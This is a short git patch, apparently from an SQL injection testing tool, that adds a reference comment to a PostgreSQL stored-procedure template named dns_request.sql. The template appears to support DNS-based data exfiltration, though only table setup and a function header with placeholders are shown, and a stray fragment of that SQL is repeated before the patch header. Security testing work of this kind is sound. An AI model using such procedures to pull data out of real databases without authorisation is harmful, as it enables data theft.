%RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ From d762098cce5c35aab849a0225dcbe81ef4c75eca Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 15 Oct 2015 16:51:53 +0200 Subject: [PATCH 92/92] Leaving a reference just in case --- procs/postgresql/dns_request.sql | 1 + 1 file changed, 1 insertion(+) diff --git a/procs/postgresql/dns_request.sql b/procs/postgresql/dns_request.sql index dd04d8663..6724af223 100644 --- a/procs/postgresql/dns_request.sql +++ b/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$